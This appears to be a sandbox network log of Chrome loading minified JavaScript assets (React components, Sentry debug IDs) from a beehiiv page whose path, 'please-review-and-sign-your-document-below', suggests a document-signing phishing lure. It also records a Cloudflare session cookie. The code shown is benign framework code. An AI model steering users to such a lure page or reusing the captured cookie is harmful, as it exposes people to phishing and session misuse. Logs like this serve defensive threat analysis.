                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC913INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 4621
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"120d-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8adda5b4316-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC456INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 36 30 38 66 33 63 62 2d 30 32 61 33 2d 35 61 34 36 2d 39 63 38 38 2d 30 39 38 63 36 31 65 36 38 62 37 34 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9608f3cb-02a3-5a46-9c88-098c61e68b74")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 73 5b 72 5d 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6e 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 74 29 26 26 28 65 5b 74 5d 3d 6e 5b 74 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 64 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 77 28 65 2c 72 3d 5b 5d 29 7b 6c 65 74 20 6e 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 73 2c 6c 29 7b 63 6f 6e 73 74 20 63 3d 6f 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6c 29 2c 69 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 3d 5b 2e 2e 2e 6e 2c 6c 5d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 24 29 7b 63 6f 6e 73 74 7b 73 63 6f 70 65 3a 75 2c 63 68 69 6c 64 72 65 6e 3a 78 2c 2e 2e 2e 70 7d 3d 24 2c 79 3d 75 3f 2e 5b
                                                                                                                                            Data Ascii: s[r];for(var t in n)Object.prototype.hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},d.apply(this,arguments)}function w(e,r=[]){let n=[];function t(s,l){const c=o.createContext(l),i=n.length;n=[...n,l];function f($){const{scope:u,children:x,...p}=$,y=u?.[
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 6c 29 3f 6c 2e 70 72 6f 70 73 2e 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3a 69 29 3b 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2c 64 28 7b 7d 2c 74 2c 7b 72 65 66 3a 72 7d 29 2c 6f 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 6c 29 3f 6f 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 6c 2c 76 6f 69 64 20 30 2c 63 29 3a 6e 75 6c 6c 29 7d 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2c 64 28 7b 7d 2c 74 2c 7b 72 65 66 3a 72 7d 29 2c 6e 29 7d 29 3b 45 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 53 6c 6f 74 22 3b 63 6f 6e 73 74 20 62 3d 6f 2e 66 6f 72 77 61 72 64 52 65 66 28 28 65 2c 72 29 3d 3e 7b 63 6f 6e 73 74 7b 63 68 69 6c 64 72 65 6e 3a 6e 2c 2e 2e 2e 74 7d 3d 65 3b 72 65 74 75 72 6e 20 6f 2e 69 73 56
                                                                                                                                            Data Ascii: l)?l.props.children:null:i);return o.createElement(b,d({},t,{ref:r}),o.isValidElement(l)?o.cloneElement(l,void 0,c):null)}return o.createElement(b,d({},t,{ref:r}),n)});E.displayName="Slot";const b=o.forwardRef((e,r)=>{const{children:n,...t}=e;return o.isV
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 72 69 61 2d 76 61 6c 75 65 6d 69 6e 22 3a 30 2c 22 61 72 69 61 2d 76 61 6c 75 65 6e 6f 77 22 3a 6d 28 69 29 3f 69 3a 76 6f 69 64 20 30 2c 22 61 72 69 61 2d 76 61 6c 75 65 74 65 78 74 22 3a 66 2c 72 6f 6c 65 3a 22 70 72 6f 67 72 65 73 73 62 61 72 22 2c 22 64 61 74 61 2d 73 74 61 74 65 22 3a 4e 28 69 2c 63 29 2c 22 64 61 74 61 2d 76 61 6c 75 65 22 3a 69 3f 3f 76 6f 69 64 20 30 2c 22 64 61 74 61 2d 6d 61 78 22 3a 63 7d 2c 6c 2c 7b 72 65 66 3a 72 7d 29 29 29 7d 29 3b 53 2e 70 72 6f 70 54 79 70 65 73 3d 7b 6d 61 78 28 65 2c 72 2c 6e 29 7b 63 6f 6e 73 74 20 74 3d 65 5b 72 5d 2c 61 3d 53 74 72 69 6e 67 28 74 29 3b 72 65 74 75 72 6e 20 74 26 26 21 67 28 74 29 3f 6e 65 77 20 45 72 72 6f 72 28 55 28 61 2c 6e 29 29 3a 6e 75 6c 6c 7d 2c 76 61 6c 75 65 28 65 2c 72 2c
                                                                                                                                            Data Ascii: ria-valuemin":0,"aria-valuenow":m(i)?i:void 0,"aria-valuetext":f,role:"progressbar","data-state":N(i,c),"data-value":i??void 0,"data-max":c},l,{ref:r})))});S.propTypes={max(e,r,n){const t=e[r],a=String(t);return t&&!g(t)?new Error(U(a,n)):null},value(e,r,
                                                                                                                                            2025-01-15 18:14:36 UTC58INData Raw: 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 39 36 30 38 66 33 63 62 2d 30 32 61 33 2d 35 61 34 36 2d 39 63 38 38 2d 30 39 38 63 36 31 65 36 38 62 37 34 0a
                                                                                                                                            Data Ascii: .js.map//# debugId=9608f3cb-02a3-5a46-9c88-098c61e68b74


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            76192.168.2.1649803104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC840OUTGET /assets/index-DTtuIjz-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2491
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"9bb-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8adfe9c41b2-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 38 34 38 35 65 32 31 34 2d 61 61 32 66 2d 35 62 35 39 2d 62 34 37 65 2d 63 37 38 30 64 38 66 61 30 33 32 36 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="8485e214-aa2f-5b59-b47e-c780d8fa0326")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 74 28 6e 75 6c 6c 29 2c 63 3d 7b 64 69 64 43 61 74 63 68 3a 21 31 2c 65 72 72 6f 72 3a 6e 75 6c 6c 7d 3b 63 6c 61 73 73 20 70 20 65 78 74 65 6e 64 73 20 69 2e 43 6f 6d 70 6f 6e 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 72 29 7b 73 75 70 65 72 28 72 29 2c 74 68 69 73 2e 72 65 73 65 74 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3d 74 68 69 73 2e 72 65 73 65 74 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 63 7d 73 74 61 74 69 63 20 67 65 74 44 65 72 69 76 65 64 53 74 61 74 65 46 72 6f 6d 45 72 72 6f 72 28 72 29 7b 72 65 74 75 72 6e 7b 64 69 64 43 61 74 63 68 3a 21 30 2c 65 72 72 6f 72 3a 72 7d 7d 72 65 73 65 74 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 28 29 7b 63 6f 6e 73 74 7b 65 72 72 6f 72 3a
                                                                                                                                            Data Ascii: t(null),c={didCatch:!1,error:null};class p extends i.Component{constructor(r){super(r),this.resetErrorBoundary=this.resetErrorBoundary.bind(this),this.state=c}static getDerivedStateFromError(r){return{didCatch:!0,error:r}}resetErrorBoundary(){const{error:
                                                                                                                                            2025-01-15 18:14:36 UTC665INData Raw: 6e 67 74 68 21 3d 3d 72 2e 6c 65 6e 67 74 68 7c 7c 65 2e 73 6f 6d 65 28 28 6e 2c 74 29 3d 3e 21 4f 62 6a 65 63 74 2e 69 73 28 6e 2c 72 5b 74 5d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 7b 65 72 72 6f 72 3a 65 7d 29 7b 72 65 74 75 72 6e 20 64 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 6d 61 78 2d 77 2d 32 78 6c 20 66 6c 65 78 2d 63 6f 6c 20 73 70 61 63 65 2d 79 2d 32 20 70 79 2d 38 22 2c 63 68 69 6c 64 72 65 6e 3a 64 2e 6a 73 78 28 6d 2c 7b 61 73 3a 22 70 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 73 69 7a 65 3a 22 6d 64 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 74 65 78 74 2d 63 65 6e 74 65 72 20 6c 65 61 64 69 6e 67 2d 74 69 67 68 74 20 74 72 61 63 6b 69 6e 67 2d 6e 6f 72 6d 61 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 65
                                                                                                                                            Data Ascii: ngth!==r.length||e.some((n,t)=>!Object.is(n,r[t]))}function y({error:e}){return d.jsx("div",{className:"flex max-w-2xl flex-col space-y-2 py-8",children:d.jsx(m,{as:"p",type:"body",size:"md",className:"text-center leading-tight tracking-normal",children:e


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            77192.168.2.1649805104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC550OUTGET /assets/Input-snMSpc3o.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1602
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"642-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ae19af0c9e-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 63 36 39 34 34 65 65 2d 35 36 38 31 2d 35 39 66 62 2d 38 38 61 61 2d 33 36 39 34 65 62 39 31 63 66 30 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6944ee-5681-59fb-88aa-3694eb91cf0b")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1138INData Raw: 65 6c 3a 6c 2c 6c 61 62 65 6c 43 6f 6c 6f 72 3a 69 2c 66 6f 6e 74 43 6f 6c 6f 72 3a 6d 2c 68 65 6c 70 65 72 43 6f 6c 6f 72 3a 75 2c 64 69 73 61 62 6c 65 64 3a 70 2c 6f 6e 46 6f 63 75 73 3a 78 2c 6f 6e 42 6c 75 72 3a 67 2c 6f 6e 43 68 61 6e 67 65 3a 68 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 62 2c 68 65 6c 70 65 72 54 65 78 74 3a 73 2c 65 72 72 6f 72 54 65 78 74 3a 74 2c 74 79 70 65 3a 79 3d 22 74 65 78 74 22 2c 72 65 71 75 69 72 65 64 3a 66 3d 21 30 2c 76 61 6c 75 65 3a 77 2c 2e 2e 2e 6a 7d 3d 6e 3b 72 65 74 75 72 6e 20 72 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 73 70 61 63 65 2d 79 2d 31 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 6c 26 26 72 2e 6a 73 78 28 22 6c 61 62 65 6c 22 2c 7b 68 74 6d 6c 46 6f 72 3a 6f 2c 63 6c 61 73 73 4e 61 6d
                                                                                                                                            Data Ascii: el:l,labelColor:i,fontColor:m,helperColor:u,disabled:p,onFocus:x,onBlur:g,onChange:h,onKeyDown:b,helperText:s,errorText:t,type:y="text",required:f=!0,value:w,...j}=n;return r.jsxs("div",{className:"space-y-1",children:[l&&r.jsx("label",{htmlFor:o,classNam


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            78192.168.2.1649804104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:36 UTC840OUTGET /assets/index-DWIcfCyK.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:36 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:36 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 2215
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"8a7-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4163
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8ae1fe1efa9-EWR
                                                                                                                                            2025-01-15 18:14:36 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 30 39 30 37 31 63 31 2d 65 65 37 34 2d 35 61 63 33 2d 38 33 33 35 2d 62 36 66 62 39 65 34 33 37 36 33 37 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="009071c1-ee74-5ac3-8335-b6fb9e437637")}catch(
                                                                                                                                            2025-01-15 18:14:36 UTC1369INData Raw: 61 73 20 79 2c 4c 20 61 73 20 62 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 63 6f 6e 73 74 20 6b 3d 28 7b 69 73 46 75 6c 6c 57 69 64 74 68 3a 6c 3d 21 31 2c 69 6e 6c 69 6e 65 3a 6e 3d 21 31 2c 65 72 72 6f 72 43 6f 64 65 3a 74 3d 22 34 30 34 22 2c 70 75 62 6c 69 63 61 74 69 6f 6e 50 72 65 73 65 6e 74 3a 6f 3d 21 30 2c 63 75 73 74 6f 6d 54 69 74 6c 65 3a 66 2c 63 75 73 74 6f 6d 44 65 73 63 72 69 70 74 69 6f 6e 3a 68 2c 65 72 72 6f 72 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 74 3a 61 2c 69 31 38 6e 3a 63 7d 3d 4e 28 29 2c 70 3d 63 2e 65 78 69 73 74 73 28 60 65 72 72 6f 72 73 2e 24 7b 74 7d 2e 74 69 74 6c 65 60 29 3f 61 28 60 65 72 72 6f 72 73 2e 24 7b 74 7d 2e 74 69 74 6c 65 60 29 3a 61 28 22 65 72 72 6f 72
                                                                                                                                            Data Ascii: as y,L as b}from"./components-Oj2xMfGE.js";const k=({isFullWidth:l=!1,inline:n=!1,errorCode:t="404",publicationPresent:o=!0,customTitle:f,customDescription:h,error:e})=>{const{t:a,i18n:c}=N(),p=c.exists(`errors.${t}.title`)?a(`errors.${t}.title`):a("error
                                                                                                                                            2025-01-15 18:14:36 UTC389INData Raw: 73 4e 61 6d 65 3a 22 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 20 74 65 78 74 2d 67 72 61 79 2d 35 30 30 22 2c 63 68 69 6c 64 72 65 6e 3a 22 45 72 72 6f 72 20 44 65 74 61 69 6c 73 22 7d 29 2c 73 2e 6a 73 78 28 22 70 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 74 2d 32 20 74 65 78 74 2d 73 6d 20 74 65 78 74 2d 67 72 61 79 2d 39 30 30 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6d 65 73 73 61 67 65 7d 29 2c 65 3f 2e 73 74 61 63 6b 26 26 73 2e 6a 73 78 28 22 70 72 65 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 74 2d 32 20 77 2d 5b 33 36 30 70 78 5d 20 6f 76 65 72 66 6c 6f 77 2d 78 2d 61 75 74 6f 20 74 65 78 74 2d 73 6d 20 74 65 78 74 2d 67 72 61 79 2d 39 30 30 20 73 6d 3a 77 2d 5b 34 38 30 70 78 5d 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 73 74 61
